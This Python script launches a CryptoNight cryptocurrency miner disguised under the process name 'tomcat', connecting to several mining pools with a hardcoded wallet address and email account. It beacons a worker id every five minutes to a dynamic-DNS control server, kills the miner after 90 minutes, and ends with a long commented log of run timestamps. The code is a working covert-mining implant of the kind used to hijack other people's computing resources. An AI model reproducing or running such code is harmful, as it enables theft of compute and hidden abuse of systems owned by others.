import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:33:07.112391
#2018-02-17 17:21:01.522208
#2018-02-17 19:09:06.509693
#2018-02-17 20:58:06.232157
#2018-02-17 22:44:03.849609
#2018-02-18 00:28:06.152360
#2018-02-18 02:19:07.288612
#2018-02-18 04:06:05.167249
#2018-02-18 05:56:06.804336
#2018-02-18 07:46:05.557074
#2018-02-18 09:34:01.856294
#2018-02-18 11:19:07.638291
#2018-02-18 13:05:04.256904
#2018-02-18 14:52:01.342544
#2018-02-18 16:40:01.546727
#2018-02-18 18:29:01.275863
#2018-02-18 20:17:03.727151
#2018-02-18 22:02:03.873358
#2018-02-18 23:51:05.333408
#2018-02-19 01:37:05.541101
#2018-02-19 03:24:08.717449
#2018-02-19 05:09:07.463452
#2018-02-19 06:55:07.132231
#2018-02-19 08:44:04.700557
#2018-02-19 10:34:01.516204
#2018-02-19 12:21:04.440316
#2018-02-19 14:08:01.929208
#2018-02-19 15:57:04.421489
#2018-02-19 17:46:09.321276
#2018-02-19 19:35:07.705977
#2018-02-19 21:23:03.435855
#2018-02-19 23:09:02.116308
#2018-02-20 00:54:01.539595
#2018-02-20 02:44:07.876508
#2018-02-20 04:33:02.142783
#2018-02-20 06:17:01.934019
#2018-02-20 08:02:04.584594
#2018-02-20 09:48:02.005818
#2018-02-20 11:32:01.767762
#2018-02-20 13:20:08.224983
#2018-02-20 15:05:02.541610
#2018-02-20 16:51:07.175399
#2018-02-20 18:41:05.459523
#2018-02-20 20:33:08.297143
#2018-02-20 22:18:07.668562
#2018-02-20 23:58:07.918225
#2018-02-21 01:44:05.343037
#2018-02-21 03:35:08.449908
#2018-02-21 05:24:03.844084
#2018-02-21 07:11:03.919902
#2018-02-21 08:58:04.523146
#2018-02-21 10:46:09.786707
#2018-02-21 12:33:06.676634
#2018-02-21 14:19:08.107900
#2018-02-21 16:08:05.107980
#2018-02-21 18:00:08.624719
#2018-02-21 19:47:01.883489
#2018-02-21 21:35:08.832570
#2018-02-21 23:22:04.196920
#2018-02-22 01:11:01.966549
#2018-02-22 02:58:04.965834
#2018-02-22 04:45:07.640038
#2018-02-22 06:31:04.200985
#2018-02-22 08:18:07.506349
#2018-02-22 10:07:06.901530
#2018-02-22 11:53:08.547773
#2018-02-22 13:37:05.499983
#2018-02-22 15:27:10.060732
#2018-02-22 17:14:09.817073
#2018-02-22 19:01:10.421017
#2018-02-22 20:53:01.459803
#2018-02-22 22:39:07.459448
#2018-02-23 00:27:04.761872
#2018-02-23 02:15:02.144348
#2018-02-23 04:02:01.980551
#2018-02-23 05:49:07.098645
#2018-02-23 07:37:05.106671
#2018-02-23 09:40:07.436608
#2018-02-23 11:44:08.117847
#2018-02-23 13:35:07.900533
#2018-02-23 15:22:04.881619
#2018-02-23 17:10:08.163322
#2018-02-23 18:55:09.904987
#2018-02-23 20:43:10.185062
#2018-02-23 22:29:02.120960
#2018-02-24 00:16:01.219874
#2018-02-24 02:07:02.140539
#2018-02-24 03:37:01.980701
#2018-02-24 03:57:04.171432
#2018-02-24 05:26:02.157068
#2018-02-24 07:03:02.084324
#2018-02-24 08:39:06.185348
#2018-02-24 10:08:05.947828
#2018-02-24 11:54:05.264304
#2018-02-24 13:21:07.094588
#2018-02-24 14:51:06.217073
#2018-02-24 16:24:06.497248
#2018-02-24 18:01:03.495561
#2018-02-24 19:28:06.371570
#2018-02-24 21:04:07.101835
#2018-02-24 23:08:03.656878
#2018-02-25 01:31:01.301902
#2018-02-25 04:51:04.248307
#2018-02-25 08:12:06.274962